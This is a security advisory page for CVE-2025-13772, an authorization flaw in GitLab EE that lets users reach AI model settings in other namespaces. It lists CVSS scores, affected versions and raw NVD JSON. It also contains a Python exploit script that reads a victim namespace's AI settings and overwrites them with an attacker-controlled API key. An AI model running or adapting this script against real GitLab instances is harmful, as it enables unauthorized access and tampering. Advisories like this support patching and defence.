Security Vulnerability Report
中文
CVE-2025-13772 CVSS 7.1 HIGH

CVE-2025-13772

Published: 2026-01-09 10:15:45
Last Modified: 2026-01-22 17:25:25
Source: [email protected]

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to access and utilize AI model settings from unauthorized namespaces by manipulating namespace identifiers in API requests.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab EE 18.4 至 18.5.5 之前的所有版本
GitLab EE 18.6 至 18.6.3 之前的所有版本
GitLab EE 18.7 至 18.7.1 之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13772 PoC - GitLab EE AI Model Settings Unauthorized Access # Target: GitLab EE versions 18.4 to 18.5.5, 18.6 to 18.6.3, 18.7 to 18.7.1 TARGET_GITLAB = "https://victim-gitlab.example.com" ATTACKER_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx" # Low-privilege user token TARGET_NAMESPACE_ID = "victim-namespace-id" # Unauthorized namespace ID def exploit_ai_model_settings(): headers = { "PRIVATE-TOKEN": ATTACKER_TOKEN, "Content-Type": "application/json" } # Step 1: List AI model settings from unauthorized namespace endpoint = f"{TARGET_GITLAB}/api/v4/namespaces/{TARGET_NAMESPACE_ID}/ai/settings" try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: print("[+] Successfully accessed AI model settings from unauthorized namespace") print(f"[+] Response: {json.dumps(response.json(), indent=2)}") # Step 2: Attempt to modify AI model settings modify_endpoint = f"{TARGET_GITLAB}/api/v4/namespaces/{TARGET_NAMESPACE_ID}/ai/settings" modify_data = { "model_provider": "custom", "api_key": "attacker-controlled-key" } mod_response = requests.put(modify_endpoint, headers=headers, json=modify_data, timeout=10) if mod_response.status_code in [200, 204]: print("[+] Successfully modified AI model settings") elif response.status_code == 403: print("[-] Access denied - vulnerability may be patched") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": exploit_ai_model_settings()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13772", "sourceIdentifier": "[email protected]", "published": "2026-01-09T10:15:45.450", "lastModified": "2026-01-22T17:25:24.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to access and utilize AI model settings from unauthorized namespaces by manipulating namespace identifiers in API requests."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab EE que afectaba a todas las versiones desde la 18.4 antes de la 18.5.5, la 18.6 antes de la 18.6.3 y la 18.7 antes de la 18.7.1 que podría haber permitido a un usuario autenticado acceder y utilizar la configuración del modelo de IA desde espacios de nombres no autorizados manipulando identificadores de espacios de nombres en solicitudes de API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.5.5", "matchCriteriaId": "285DA1C9-F1D1-49F5-9C2A-41E6798DFD44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.3", "matchCriteriaId": "75013646-70F2-467E-B79E-9301338AB853"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.7.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "9B955F55-086B-4EDF-A9E6-5B9E68600494"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/581268", "source": "[email protected]", "tags": ["Broken Link"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.